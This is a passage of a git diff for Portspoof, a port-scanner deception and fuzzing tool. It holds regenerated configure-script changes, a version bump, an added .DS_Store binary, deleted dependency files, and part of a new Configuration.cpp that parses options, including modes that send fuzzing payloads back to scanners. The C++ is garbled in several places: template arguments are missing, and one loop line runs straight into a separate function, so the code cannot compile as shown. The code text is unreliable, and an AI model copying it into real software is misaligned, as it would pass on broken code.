]*:*=/p' "$tmp/out"`; test -z "$ac_out"; } && - { echo "$as_me:$LINENO: WARNING: $ac_file contains a reference to the variable \`datarootdir' + { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: $ac_file contains a reference to the variable \`datarootdir' which seems to be undefined. Please make sure it is defined." >&5 -echo "$as_me: WARNING: $ac_file contains a reference to the variable \`datarootdir' +$as_echo "$as_me: WARNING: $ac_file contains a reference to the variable \`datarootdir' which seems to be undefined. Please make sure it is defined." >&2;} rm -f "$tmp/stdin" case $ac_file in - -) cat "$tmp/out"; rm -f "$tmp/out";; - *) rm -f "$ac_file"; mv "$tmp/out" $ac_file;; - esac + -) cat "$tmp/out" && rm -f "$tmp/out";; + *) rm -f "$ac_file" && mv "$tmp/out" "$ac_file";; + esac \ + || as_fn_error "could not create $ac_file" "$LINENO" 5 ;; :H) # # CONFIG_HEADER # -_ACEOF - -# Transform confdefs.h into a sed script `conftest.defines', that -# substitutes the proper values into config.h.in to produce config.h. -rm -f conftest.defines conftest.tail -# First, append a space to every undef/define line, to ease matching. -echo 's/$/ /' >conftest.defines -# Then, protect against being on the right side of a sed subst, or in -# an unquoted here document, in config.status. If some macros were -# called several times there might be several #defines for the same -# symbol, which is useless. But do not sort them, since the last -# AC_DEFINE must be honored. -ac_word_re=[_$as_cr_Letters][_$as_cr_alnum]* -# These sed commands are passed to sed as "A NAME B PARAMS C VALUE D", where -# NAME is the cpp macro being defined, VALUE is the value it is being given. -# PARAMS is the parameter list in the macro definition--in most cases, it's -# just an empty string. -ac_dA='s,^\\([ #]*\\)[^ ]*\\([ ]*' -ac_dB='\\)[ (].*,\\1define\\2' -ac_dC=' ' -ac_dD=' ,' - -uniq confdefs.h | - sed -n ' - t rset - :rset - s/^[ ]*#[ ]*define[ ][ ]*// - t ok - d - :ok - s/[\\&,]/\\&/g - s/^\('"$ac_word_re"'\)\(([^()]*)\)[ ]*\(.*\)/ '"$ac_dA"'\1'"$ac_dB"'\2'"${ac_dC}"'\3'"$ac_dD"'/p - s/^\('"$ac_word_re"'\)[ ]*\(.*\)/'"$ac_dA"'\1'"$ac_dB$ac_dC"'\2'"$ac_dD"'/p - ' >>conftest.defines - -# Remove the space that was appended to ease matching. -# Then replace #undef with comments. This is necessary, for -# example, in the case of _POSIX_SOURCE, which is predefined and required -# on some systems where configure will not decide to define it. -# (The regexp can be short, since the line contains either #define or #undef.) -echo 's/ $// -s,^[ #]*u.*,/* & */,' >>conftest.defines - -# Break up conftest.defines: -ac_max_sed_lines=50 - -# First sed command is: sed -f defines.sed $ac_file_inputs >"$tmp/out1" -# Second one is: sed -f defines.sed "$tmp/out1" >"$tmp/out2" -# Third one will be: sed -f defines.sed "$tmp/out2" >"$tmp/out1" -# et cetera. -ac_in='$ac_file_inputs' -ac_out='"$tmp/out1"' -ac_nxt='"$tmp/out2"' - -while : -do - # Write a here document: - cat >>$CONFIG_STATUS <<_ACEOF - # First, check the format of the line: - cat >"\$tmp/defines.sed" <<\\CEOF -/^[ ]*#[ ]*undef[ ][ ]*$ac_word_re[ ]*/b def -/^[ ]*#[ ]*define[ ][ ]*$ac_word_re[( ]/b def -b -:def -_ACEOF - sed ${ac_max_sed_lines}q conftest.defines >>$CONFIG_STATUS - echo 'CEOF - sed -f "$tmp/defines.sed"' "$ac_in >$ac_out" >>$CONFIG_STATUS - ac_in=$ac_out; ac_out=$ac_nxt; ac_nxt=$ac_in - sed 1,${ac_max_sed_lines}d conftest.defines >conftest.tail - grep . conftest.tail >/dev/null || break - rm -f conftest.defines - mv conftest.tail conftest.defines -done -rm -f conftest.defines conftest.tail - -echo "ac_result=$ac_in" >>$CONFIG_STATUS -cat >>$CONFIG_STATUS <<\_ACEOF if test x"$ac_file" != x-; then - echo "/* $configure_input */" >"$tmp/config.h" - cat "$ac_result" >>"$tmp/config.h" - if diff $ac_file "$tmp/config.h" >/dev/null 2>&1; then - { echo "$as_me:$LINENO: $ac_file is unchanged" >&5 -echo "$as_me: $ac_file is unchanged" >&6;} + { + $as_echo "/* $configure_input */" \ + && eval '$AWK -f "$tmp/defines.awk"' "$ac_file_inputs" + } >"$tmp/config.h" \ + || as_fn_error "could not create $ac_file" "$LINENO" 5 + if diff "$ac_file" "$tmp/config.h" >/dev/null 2>&1; then + { $as_echo "$as_me:${as_lineno-$LINENO}: $ac_file is unchanged" >&5 +$as_echo "$as_me: $ac_file is unchanged" >&6;} else - rm -f $ac_file - mv "$tmp/config.h" $ac_file + rm -f "$ac_file" + mv "$tmp/config.h" "$ac_file" \ + || as_fn_error "could not create $ac_file" "$LINENO" 5 fi else - echo "/* $configure_input */" - cat "$ac_result" + $as_echo "/* $configure_input */" \ + && eval '$AWK -f "$tmp/defines.awk"' "$ac_file_inputs" \ + || as_fn_error "could not create -" "$LINENO" 5 fi - rm -f "$tmp/out12" -# Compute $ac_file's index in $config_headers. +# Compute "$ac_file"'s index in $config_headers. +_am_arg="$ac_file" _am_stamp_count=1 for _am_header in $config_headers :; do case $_am_header in - $ac_file | $ac_file:* ) + $_am_arg | $_am_arg:* ) break ;; * ) _am_stamp_count=`expr $_am_stamp_count + 1` ;; esac done -echo "timestamp for $ac_file" >`$as_dirname -- $ac_file || -$as_expr X$ac_file : 'X\(.*[^/]\)//*[^/][^/]*/*$' \| \ - X$ac_file : 'X\(//\)[^/]' \| \ - X$ac_file : 'X\(//\)$' \| \ - X$ac_file : 'X\(/\)' \| . 2>/dev/null || -echo X$ac_file | +echo "timestamp for $_am_arg" >`$as_dirname -- "$_am_arg" || +$as_expr X"$_am_arg" : 'X\(.*[^/]\)//*[^/][^/]*/*$' \| \ + X"$_am_arg" : 'X\(//\)[^/]' \| \ + X"$_am_arg" : 'X\(//\)$' \| \ + X"$_am_arg" : 'X\(/\)' \| . 2>/dev/null || +$as_echo X"$_am_arg" | sed '/^X\(.*[^/]\)\/\/*[^/][^/]*\/*$/{ s//\1/ q @@ -6205,30 +6270,40 @@ echo X$ac_file | s/.*/./; q'`/stamp-h$_am_stamp_count ;; - :C) { echo "$as_me:$LINENO: executing $ac_file commands" >&5 -echo "$as_me: executing $ac_file commands" >&6;} + :C) { $as_echo "$as_me:${as_lineno-$LINENO}: executing $ac_file commands" >&5 +$as_echo "$as_me: executing $ac_file commands" >&6;} ;; esac case $ac_file$ac_mode in - "depfiles":C) test x"$AMDEP_TRUE" != x"" || for mf in $CONFIG_FILES; do - # Strip MF so we end up with the name of the file. - mf=`echo "$mf" | sed -e 's/:.*$//'` - # Check whether this is an Automake generated Makefile or not. - # We used to match only the files named `Makefile.in', but - # some people rename them; so instead we look at the file content. - # Grep'ing the first line is not enough: some people post-process - # each Makefile.in and add a new line on top of each file to say so. - # Grep'ing the whole file is not good either: AIX grep has a line - # limit of 2048, but all sed's we know have understand at least 4000. - if sed 10q "$mf" | grep '^#.*generated by automake' > /dev/null 2>&1; then - dirpart=`$as_dirname -- "$mf" || + "depfiles":C) test x"$AMDEP_TRUE" != x"" || { + # Autoconf 2.62 quotes --file arguments for eval, but not when files + # are listed without --file. Let's play safe and only enable the eval + # if we detect the quoting. + case $CONFIG_FILES in + *\'*) eval set x "$CONFIG_FILES" ;; + *) set x $CONFIG_FILES ;; + esac + shift + for mf + do + # Strip MF so we end up with the name of the file. + mf=`echo "$mf" | sed -e 's/:.*$//'` + # Check whether this is an Automake generated Makefile or not. + # We used to match only the files named `Makefile.in', but + # some people rename them; so instead we look at the file content. + # Grep'ing the first line is not enough: some people post-process + # each Makefile.in and add a new line on top of each file to say so. + # Grep'ing the whole file is not good either: AIX grep has a line + # limit of 2048, but all sed's we know have understand at least 4000. + if sed -n 's,^#.*generated by automake.*,X,p' "$mf" | grep X >/dev/null 2>&1; then + dirpart=`$as_dirname -- "$mf" || $as_expr X"$mf" : 'X\(.*[^/]\)//*[^/][^/]*/*$' \| \ X"$mf" : 'X\(//\)[^/]' \| \ X"$mf" : 'X\(//\)$' \| \ X"$mf" : 'X\(/\)' \| . 2>/dev/null || -echo X"$mf" | +$as_echo X"$mf" | sed '/^X\(.*[^/]\)\/\/*[^/][^/]*\/*$/{ s//\1/ q @@ -6246,33 +6321,33 @@ echo X"$mf" | q } s/.*/./; q'` - else - continue - fi - # Extract the definition of DEPDIR, am__include, and am__quote - # from the Makefile without running `make'. - DEPDIR=`sed -n 's/^DEPDIR = //p' < "$mf"` - test -z "$DEPDIR" && continue - am__include=`sed -n 's/^am__include = //p' < "$mf"` - test -z "am__include" && continue - am__quote=`sed -n 's/^am__quote = //p' < "$mf"` - # When using ansi2knr, U may be empty or an underscore; expand it - U=`sed -n 's/^U = //p' < "$mf"` - # Find all dependency output files, they are included files with - # $(DEPDIR) in their names. We invoke sed twice because it is the - # simplest approach to changing $(DEPDIR) to its actual value in the - # expansion. - for file in `sed -n " - s/^$am__include $am__quote\(.*(DEPDIR).*\)$am__quote"'$/\1/p' <"$mf" | \ - sed -e 's/\$(DEPDIR)/'"$DEPDIR"'/g' -e 's/\$U/'"$U"'/g'`; do - # Make sure the directory exists. - test -f "$dirpart/$file" && continue - fdir=`$as_dirname -- "$file" || + else + continue + fi + # Extract the definition of DEPDIR, am__include, and am__quote + # from the Makefile without running `make'. + DEPDIR=`sed -n 's/^DEPDIR = //p' < "$mf"` + test -z "$DEPDIR" && continue + am__include=`sed -n 's/^am__include = //p' < "$mf"` + test -z "am__include" && continue + am__quote=`sed -n 's/^am__quote = //p' < "$mf"` + # When using ansi2knr, U may be empty or an underscore; expand it + U=`sed -n 's/^U = //p' < "$mf"` + # Find all dependency output files, they are included files with + # $(DEPDIR) in their names. We invoke sed twice because it is the + # simplest approach to changing $(DEPDIR) to its actual value in the + # expansion. + for file in `sed -n " + s/^$am__include $am__quote\(.*(DEPDIR).*\)$am__quote"'$/\1/p' <"$mf" | \ + sed -e 's/\$(DEPDIR)/'"$DEPDIR"'/g' -e 's/\$U/'"$U"'/g'`; do + # Make sure the directory exists. + test -f "$dirpart/$file" && continue + fdir=`$as_dirname -- "$file" || $as_expr X"$file" : 'X\(.*[^/]\)//*[^/][^/]*/*$' \| \ X"$file" : 'X\(//\)[^/]' \| \ X"$file" : 'X\(//\)$' \| \ X"$file" : 'X\(/\)' \| . 2>/dev/null || -echo X"$file" | +$as_echo X"$file" | sed '/^X\(.*[^/]\)\/\/*[^/][^/]*\/*$/{ s//\1/ q @@ -6290,62 +6365,25 @@ echo X"$file" | q } s/.*/./; q'` - { as_dir=$dirpart/$fdir - case $as_dir in #( - -*) as_dir=./$as_dir;; - esac - test -d "$as_dir" || { $as_mkdir_p && mkdir -p "$as_dir"; } || { - as_dirs= - while :; do - case $as_dir in #( - *\'*) as_qdir=`echo "$as_dir" | sed "s/'/'\\\\\\\\''/g"`;; #( - *) as_qdir=$as_dir;; - esac - as_dirs="'$as_qdir' $as_dirs" - as_dir=`$as_dirname -- "$as_dir" || -$as_expr X"$as_dir" : 'X\(.*[^/]\)//*[^/][^/]*/*$' \| \ - X"$as_dir" : 'X\(//\)[^/]' \| \ - X"$as_dir" : 'X\(//\)$' \| \ - X"$as_dir" : 'X\(/\)' \| . 2>/dev/null || -echo X"$as_dir" | - sed '/^X\(.*[^/]\)\/\/*[^/][^/]*\/*$/{ - s//\1/ - q - } - /^X\(\/\/\)[^/].*/{ - s//\1/ - q - } - /^X\(\/\/\)$/{ - s//\1/ - q - } - /^X\(\/\).*/{ - s//\1/ - q - } - s/.*/./; q'` - test -d "$as_dir" && break + as_dir=$dirpart/$fdir; as_fn_mkdir_p + # echo "creating $dirpart/$file" + echo '# dummy' > "$dirpart/$file" done - test -z "$as_dirs" || eval "mkdir $as_dirs" - } || test -d "$as_dir" || { { echo "$as_me:$LINENO: error: cannot create directory $as_dir" >&5 -echo "$as_me: error: cannot create directory $as_dir" >&2;} - { (exit 1); exit 1; }; }; } - # echo "creating $dirpart/$file" - echo '# dummy' > "$dirpart/$file" done -done +} ;; esac done # for ac_tag -{ (exit 0); exit 0; } +as_fn_exit 0 _ACEOF -chmod +x $CONFIG_STATUS ac_clean_files=$ac_clean_files_save +test $ac_write_fail = 0 || + as_fn_error "write failure creating $CONFIG_STATUS" "$LINENO" 5 + # configure is writing to config.log, and then calls config.status. # config.status does its own redirection, appending to config.log. @@ -6365,6 +6403,10 @@ if test "$no_create" != yes; then exec 5>>config.log # Use ||, not &&, to avoid exiting from the if with $? = 1, which # would make configure fail if this is the last instruction. - $ac_cs_success || { (exit 1); exit 1; } + $ac_cs_success || as_fn_exit $? +fi +if test -n "$ac_unrecognized_opts" && test "$enable_option_checking" != no; then + { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: unrecognized options: $ac_unrecognized_opts" >&5 +$as_echo "$as_me: WARNING: unrecognized options: $ac_unrecognized_opts" >&2;} fi diff --git a/configure.in b/configure.in old mode 100644 new mode 100755 index 69e049c..704fabe --- a/configure.in +++ b/configure.in @@ -4,12 +4,12 @@ CFLASGS="${CFLAGS=}" AC_PREREQ(2.61) -AC_INIT([portspoof], [0.3], [piotr@duszynski.eu]) +AC_INIT([portspoof], [1.0], [piotr[at]duszynski.eu]) AC_CONFIG_AUX_DIR(auto) AC_CONFIG_MACRO_DIR([m4]) -AM_INIT_AUTOMAKE(portspoof,0.2) -AC_CONFIG_SRCDIR([src/portspoof.c]) +AM_INIT_AUTOMAKE(portspoof,1.0) +AC_CONFIG_SRCDIR([src/Portspoof.cpp]) AC_CONFIG_HEADER([src/config.h]) AC_DEFINE([_GNU_SOURCE], [1], [Use GNU source]) @@ -23,14 +23,10 @@ case "$host_os" in linux*) AC_DEFINE_UNQUOTED(LINUX,1,[This is a Linux system]) ;; -openbsd*) - AC_DEFINE_UNQUOTED(SOMEBSD,1,[This is a BSD system]) - AC_DEFINE_UNQUOTED(OPENBSD,1,[This is an OpenBSD system]) -;; esac # Checks for programs. -AC_PROG_CC +AC_PROG_CXX AM_PROG_CC_C_O AC_PROG_INSTALL AC_PROG_MAKE_SET diff --git a/src/.DS_Store b/src/.DS_Store new file mode 100755 index 0000000000000000000000000000000000000000..5a4c3046996eade5dc989908c673a3bc9dc197e3 GIT binary patch literal 6148 zcmeHK%Sr=55Ukc50=eYqael!+7()C4KOjD$AS?uog2z4iU4B}s9|+6Fi{M47p}S^! zyLOm5Y;Oaw&HMfuSOZwn9r5X5ZvNbTW*3z)BAxHJ#}3bU!GNb(_4$NzSFHZP8(t^; z8c9h8O{e z3#P-kj#+}(JVES*VLuSI;@5dtCOuJ6pPdO{ubr1o~S4V zq`*{x%iONL|KHGmnE$6F?WBMd_*V+pVtc#Y@JiKNXP5I{+vs<6ulb_8aUB$fXvf58 i$J}^3zKWu(Yrf|5UN|NOo%x^>^)ukQ$fUquD{ul0nib&y literal 0 HcmV?d00001 diff --git a/src/.deps/connection.Po b/src/.deps/connection.Po deleted file mode 100644 index 9ce06a8..0000000 --- a/src/.deps/connection.Po +++ /dev/null @@ -1 +0,0 @@ -# dummy diff --git a/src/.deps/connection.Tpo b/src/.deps/connection.Tpo deleted file mode 100644 index a400417..0000000 --- a/src/.deps/connection.Tpo +++ /dev/null @@ -1,231 +0,0 @@ -connection.o connection.o: connection.c connection.h \ - /usr/include/sys/socket.h /usr/include/sys/types.h \ - /usr/include/sys/appleapiopts.h /usr/include/sys/cdefs.h \ - /usr/include/sys/_symbol_aliasing.h \ - /usr/include/sys/_posix_availability.h /usr/include/machine/types.h \ - /usr/include/i386/types.h /usr/include/i386/_types.h \ - /usr/include/sys/_types.h /usr/include/machine/_types.h \ - /usr/include/machine/endian.h /usr/include/i386/endian.h \ - /usr/include/sys/_endian.h /usr/include/libkern/_OSByteOrder.h \ - /usr/include/libkern/i386/_OSByteOrder.h /usr/include/sys/_structs.h \ - /usr/include/machine/_param.h /usr/include/i386/_param.h \ - /usr/include/Availability.h /usr/include/AvailabilityInternal.h \ - /usr/include/assert.h /usr/include/net/if.h /usr/include/net/if_var.h \ - /usr/include/stdint.h /usr/include/sys/time.h /usr/include/time.h \ - /usr/include/_types.h /usr/include/_structs.h \ - /usr/include/sys/_select.h /usr/include/sys/queue.h \ - /usr/include/sys/ioctl.h /usr/include/sys/ttycom.h \ - /usr/include/sys/ioccom.h /usr/include/sys/filio.h \ - /usr/include/sys/sockio.h /usr/include/sys/stat.h \ - /usr/include/netinet/in.h /usr/include/netinet6/in6.h \ - /usr/include/sys/sysctl.h /usr/include/sys/ucred.h \ - /usr/include/sys/param.h /usr/include/sys/syslimits.h \ - /usr/include/machine/param.h /usr/include/i386/param.h \ - /usr/include/i386/_param.h \ - /usr/llvm-gcc-4.2/bin/../lib/gcc/i686-apple-darwin11/4.2.1/include/limits.h \ - /usr/llvm-gcc-4.2/bin/../lib/gcc/i686-apple-darwin11/4.2.1/include/syslimits.h \ - /usr/include/limits.h /usr/include/machine/limits.h \ - /usr/include/i386/limits.h /usr/include/i386/_limits.h \ - /usr/include/sys/signal.h /usr/include/machine/signal.h \ - /usr/include/i386/signal.h /usr/include/i386/_structs.h \ - /usr/include/machine/_structs.h /usr/include/mach/i386/_structs.h \ - /usr/include/bsm/audit.h /usr/include/mach/port.h \ - /usr/include/mach/boolean.h /usr/include/mach/machine/boolean.h \ - /usr/include/mach/i386/boolean.h /usr/include/mach/machine/vm_types.h \ - /usr/include/mach/i386/vm_types.h /usr/include/mach/i386/vm_param.h \ - /usr/include/sys/proc.h /usr/include/sys/select.h \ - /usr/include/sys/lock.h /usr/include/sys/event.h /usr/include/sys/vm.h \ - /usr/include/netdb.h /usr/include/fcntl.h /usr/include/sys/fcntl.h \ - /usr/include/err.h /usr/include/errno.h /usr/include/sys/errno.h \ - /usr/include/stdio.h /usr/include/secure/_stdio.h \ - /usr/include/secure/_common.h revregex.h /usr/include/string.h \ - /usr/include/strings.h /usr/include/secure/_string.h \ - /usr/include/stdlib.h /usr/include/sys/wait.h \ - /usr/include/sys/resource.h /usr/include/alloca.h /usr/include/ctype.h \ - /usr/include/runetype.h threads.h porspoof.h - -connection.h: - -/usr/include/sys/socket.h: - -/usr/include/sys/types.h: - -/usr/include/sys/appleapiopts.h: - -/usr/include/sys/cdefs.h: - -/usr/include/sys/_symbol_aliasing.h: - -/usr/include/sys/_posix_availability.h: - -/usr/include/machine/types.h: - -/usr/include/i386/types.h: - -/usr/include/i386/_types.h: - -/usr/include/sys/_types.h: - -/usr/include/machine/_types.h: - -/usr/include/machine/endian.h: - -/usr/include/i386/endian.h: - -/usr/include/sys/_endian.h: - -/usr/include/libkern/_OSByteOrder.h: - -/usr/include/libkern/i386/_OSByteOrder.h: - -/usr/include/sys/_structs.h: - -/usr/include/machine/_param.h: - -/usr/include/i386/_param.h: - -/usr/include/Availability.h: - -/usr/include/AvailabilityInternal.h: - -/usr/include/assert.h: - -/usr/include/net/if.h: - -/usr/include/net/if_var.h: - -/usr/include/stdint.h: - -/usr/include/sys/time.h: - -/usr/include/time.h: - -/usr/include/_types.h: - -/usr/include/_structs.h: - -/usr/include/sys/_select.h: - -/usr/include/sys/queue.h: - -/usr/include/sys/ioctl.h: - -/usr/include/sys/ttycom.h: - -/usr/include/sys/ioccom.h: - -/usr/include/sys/filio.h: - -/usr/include/sys/sockio.h: - -/usr/include/sys/stat.h: - -/usr/include/netinet/in.h: - -/usr/include/netinet6/in6.h: - -/usr/include/sys/sysctl.h: - -/usr/include/sys/ucred.h: - -/usr/include/sys/param.h: - -/usr/include/sys/syslimits.h: - -/usr/include/machine/param.h: - -/usr/include/i386/param.h: - -/usr/include/i386/_param.h: - -/usr/llvm-gcc-4.2/bin/../lib/gcc/i686-apple-darwin11/4.2.1/include/limits.h: - -/usr/llvm-gcc-4.2/bin/../lib/gcc/i686-apple-darwin11/4.2.1/include/syslimits.h: - -/usr/include/limits.h: - -/usr/include/machine/limits.h: - -/usr/include/i386/limits.h: - -/usr/include/i386/_limits.h: - -/usr/include/sys/signal.h: - -/usr/include/machine/signal.h: - -/usr/include/i386/signal.h: - -/usr/include/i386/_structs.h: - -/usr/include/machine/_structs.h: - -/usr/include/mach/i386/_structs.h: - -/usr/include/bsm/audit.h: - -/usr/include/mach/port.h: - -/usr/include/mach/boolean.h: - -/usr/include/mach/machine/boolean.h: - -/usr/include/mach/i386/boolean.h: - -/usr/include/mach/machine/vm_types.h: - -/usr/include/mach/i386/vm_types.h: - -/usr/include/mach/i386/vm_param.h: - -/usr/include/sys/proc.h: - -/usr/include/sys/select.h: - -/usr/include/sys/lock.h: - -/usr/include/sys/event.h: - -/usr/include/sys/vm.h: - -/usr/include/netdb.h: - -/usr/include/fcntl.h: - -/usr/include/sys/fcntl.h: - -/usr/include/err.h: - -/usr/include/errno.h: - -/usr/include/sys/errno.h: - -/usr/include/stdio.h: - -/usr/include/secure/_stdio.h: - -/usr/include/secure/_common.h: - -revregex.h: - -/usr/include/string.h: - -/usr/include/strings.h: - -/usr/include/secure/_string.h: - -/usr/include/stdlib.h: - -/usr/include/sys/wait.h: - -/usr/include/sys/resource.h: - -/usr/include/alloca.h: - -/usr/include/ctype.h: - -/usr/include/runetype.h: - -threads.h: - -porspoof.h: diff --git a/src/.deps/portspoof-connection.Po b/src/.deps/portspoof-connection.Po deleted file mode 100644 index 9ce06a8..0000000 --- a/src/.deps/portspoof-connection.Po +++ /dev/null @@ -1 +0,0 @@ -# dummy diff --git a/src/.deps/portspoof-portspoof.Po b/src/.deps/portspoof-portspoof.Po deleted file mode 100644 index 9ce06a8..0000000 --- a/src/.deps/portspoof-portspoof.Po +++ /dev/null @@ -1 +0,0 @@ -# dummy diff --git a/src/.deps/portspoof-revregex.Po b/src/.deps/portspoof-revregex.Po deleted file mode 100644 index 9ce06a8..0000000 --- a/src/.deps/portspoof-revregex.Po +++ /dev/null @@ -1 +0,0 @@ -# dummy diff --git a/src/.deps/portspoof.Po b/src/.deps/portspoof.Po deleted file mode 100644 index 9ce06a8..0000000 --- a/src/.deps/portspoof.Po +++ /dev/null @@ -1 +0,0 @@ -# dummy diff --git a/src/.deps/revregex.Po b/src/.deps/revregex.Po deleted file mode 100644 index 9ce06a8..0000000 --- a/src/.deps/revregex.Po +++ /dev/null @@ -1 +0,0 @@ -# dummy diff --git a/src/Configuration.cpp b/src/Configuration.cpp new file mode 100755 index 0000000..93cfe33 --- /dev/null +++ b/src/Configuration.cpp @@ -0,0 +1,360 @@ +/* + * Portspoof - Service Signature Emulator / Exploitation Framework Frontend + * Copyright (C) 2012 Piotr Duszyński + * + * This program is free software; you can redistribute it and/or modify it + * under the terms of the GNU General Public License as published by the + * Free Software Foundation; either version 2 of the License, or (at your + * option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. + * See the GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License along + * with this program; if not, see . + * + * Linking portspoof statically or dynamically with other modules is making + * a combined work based on Portspoof. Thus, the terms and conditions of + * the GNU General Public License cover the whole combination. + * + * In addition, as a special exception, the copyright holder of Portspoof + * gives you permission to combine Portspoof with free software programs or + * libraries that are released under the GNU LGPL. You may copy + * and distribute such a system following the terms of the GNU GPL for + * Portspoof and the licenses of the other code concerned. + * + * Note that people who make modified versions of Portspoof are not obligated + * to grant this special exception for their modified versions; it is their + * choice whether to do so. The GNU General Public License gives permission + * to release a modified version without this exception; this exception + * also makes it possible to release a modified version which carries + * forward this exception. + */ + + + +#include "Configuration.h" + +Configuration::Configuration() +{ + configfile = std::string(CONF_FILE); + signaturefile = std::string(SIGNATURE_FILE); + logfile = std::string(LOG_FILE); + bind_ip=std::string(); + username=std::string(DAEMON_USER); + group=std::string(DAEMON_USER); + + port=DEFAULT_PORT; + opts=0; + nmapfuzzsignatures_file = std::string(NMAP_FUZZ_FILE_SIG); + fuzzpayload_file = std::string(FUZZ_FILE_PAYLOAD); + thread_number=MAX_THREADS; + fuzzing_mode=0; + return; +} + +bool Configuration::getConfigValue(int value) +{ + return this->opts[value]; +} + +void Configuration::usage(void) +{ + fprintf(stdout,"Usage: portspoof [OPTION]...\n" + "Portspoof - service signature emulator / exploitation framework.\n\n" + "-i ip : Bind to a particular IP address\n" + "-p port : Bind to a particular PORT number\n" + "-s file_path : Portspoof service signature regex. file\n" + "-c file_path : Portspoof configuration file\n" + "-l file_path : Log port scanning alerts to a file\n" + "-f file_path : FUZZER_MODE - fuzzing payload file list \n" + "-n file_path : FUZZER_MODE - wrapping signatures file list\n" + "-1 FUZZER_MODE - generate fuzzing payloads internally\n" + "-3 FUZZER_MODE - generate random byte values !\n" + "-2 switch to simple reply mode (doesn't work for Nmap)!\n" + "-D run as daemon process\n" + "-d disable syslog\n" + "-v be verbose\n" + "-h display this help and exit\n"); + + exit(1); +} + +bool Configuration::processArgs(int argc, char** argv) +{ + int ch; + extern char *__progname; + + while ((ch = getopt(argc, argv,"l:i:p:s:c:f:n:dvh123D")) != -1) { + switch (ch) { + case 'i': + this->bind_ip = std::string(optarg); + this->opts[OPT_IP]=1; + break; + case 'p': + this->port = atoi(optarg); + this->opts[OPT_PORT]=1; + break; + case 's': + this->signaturefile = std::string(optarg); + fprintf(stdout,"-> Using user defined signature file %s\n",this->signaturefile.c_str()); + this->opts[OPT_SIG_FILE]=1; + + break; + case 'c': + this->configfile = std::string(optarg); + this->opts[OPT_CONFIG_FILE]=1; + fprintf(stdout,"-> Using user defined configuration file %s\n",this->configfile.c_str()); + break; + case 'v': + this->opts[OPT_DEBUG]=1; + fprintf(stdout,"-> Verbose mode on.\n"); + break; + case 'd': + this->opts[OPT_SYSLOG_DIS]=1; + fprintf(stdout,"-> Syslog logging disabled.\n"); + break; + case 'D': + this->opts[OPT_RUN_AS_D]=1; + break; + case 'l': + this->opts[OPT_LOG_FILE]=1; + this->logfile = std::string(optarg); + fprintf(stdout,"-> Using log file %s\n",this->logfile.c_str()); + //check log file + Utils::log_create(configuration->getLogFile().c_str()); + break; + case 'f': + this->opts[OPT_FUZZ_WORDLIST]=1; + this->fuzzpayload_file=std::string(optarg); + fprintf(stdout,"-> Reading fuzzing payloads from a file %s!\n",this->fuzzpayload_file.c_str()); + break; + case 'n': + this->opts[OPT_FUZZ_NMAP]=1; + this->nmapfuzzsignatures_file=std::string(optarg); + fprintf(stdout,"-> Payload wrapping mode!\n"); + break; + case '1': + this->opts[OPT_FUZZ_INTERNAL]=1; + fprintf(stdout,"-> Generate fuzzing payloads internally!\n"); + break; + case '2': + this->opts[OPT_NOT_NMAP_SCANNER]=1; + fprintf(stdout,"-> Switching to simple reply mode (anything apart from Nmap)!\n"); + break; + case '3': + this->opts[OPT_FUZZ_RANDOM]=1; + fprintf(stdout,"-> Random int fuzzing!\n"); + break; + case 'h': + this->usage(); + break; + default: + fprintf(stdout,"Try ` %s -h' for more information.\n\n", __progname); + exit(0); + break; + } + } + + + if(this->opts==0) + { + fprintf(stdout,"-> No parameters - using default values.\n"); + } + + if(this->getConfigValue(OPT_FUZZ_NMAP) ||this->getConfigValue(OPT_FUZZ_WORDLIST) || this->getConfigValue(OPT_FUZZ_INTERNAL)) + { + this->fuzzer=new Fuzzer(this); + this->thread_number=1; //set thread count to 1 due to race conditions + this->fuzzing_mode=1; + } + + if(this->fuzzing_mode == 0) + { + + if(this->processSignatureFile()) + exit(1); + + if(this->readConfigFile()) + exit(1); + + } + + return 0; +} + +std::string Configuration::getConfigFile() +{ + return this->configfile; +} +std::string Configuration::getSignatureFile() +{ + return this->signaturefile; + +} +std::string Configuration::getNmapfuzzSignaturesFile() +{ + return this->nmapfuzzsignatures_file; +} +std::string Configuration::getFuzzPayloadFile() +{ + return this->fuzzpayload_file; + +} +std::string Configuration::getLogFile() +{ + return this->logfile; +} + +std::string Configuration::getBindIP() +{ + return this->bind_ip; +} + +unsigned short int Configuration::getPort() +{ + return this->port; +} + + +int Configuration::getThreadNr() +{ + return this->thread_number; +} + + +int Configuration::getUserid() +{ + struct passwd *pwd = getpwnam(this->username.c_str()); + if(pwd) return pwd->pw_uid; + + return -1; +} + + +int Configuration::getGroupid() +{ + struct group *grp = getgrnam(this->group.c_str()); + if(grp) return grp->gr_gid; + + return -1; + +} + + + + +std::vector Configuration::mapPort2Signature(unsigned short port) +{ + + if(this->opts[OPT_FUZZ_NMAP] || this->opts[OPT_FUZZ_INTERNAL] || this->opts[OPT_FUZZ_WORDLIST]) + { + std::vector result_vector; + result_vector=this->fuzzer->GetFUZZ(); + return result_vector; + } + else + return this->portsignatureemap[port]; +} + +bool Configuration::processSignatureFile() +{ + + char buf_file[BUFSIZE]; + + FILE *fp = fopen(this->signaturefile.c_str(), "r"); + if (fp == NULL) { + fprintf(stdout,"Error opening signature file: %s \n",this->signaturefile.c_str()); + return 1; + } + + while (fgets(buf_file, BUFSIZE, fp)) + rawsignatures.push_back(std::string(buf_file)); + + fclose(fp); + + // set random mapping + srand((unsigned)time(0)); + for(int i=0;iconfigfile.c_str(), "r"); + if (fp == NULL) { + fprintf(stdout,"Error opening file: %s \n",this->configfile.c_str()); + return 1; + } + + while (fgets(tmp, BUFSIZE, fp)) + if (strlen(tmp) >1 && tmp[0]!='#') + { + + if(sscanf(tmp, "%s %s",str1,str2)==EOF){ + fprintf(stdout,"Error in configuration file"); + exit(1); + } + + if(str1==NULL || str2==NULL) + { + fprintf(stdout,"Error in configuration file"); + exit(1); + } + + if(Utils::isNumeric(str1)) //single port + { + sscanf(str1,"%d",&lp); + //DEBUG + //fprintf(stdout,"port %d value: %s\n",lp,Utils::get_substring_value(tmp)); + + portsignatureemap[lp]=process_signature(std::string(Utils::get_substring_value(tmp))); + continue; + } + else + { + if(sscanf(str1, "%d-%d",&lp,&hp)==EOF){ + fprintf(stdout,"Error in configuration file\n"); + exit(1); + } + + if(lp==0 || hp==0) + { + 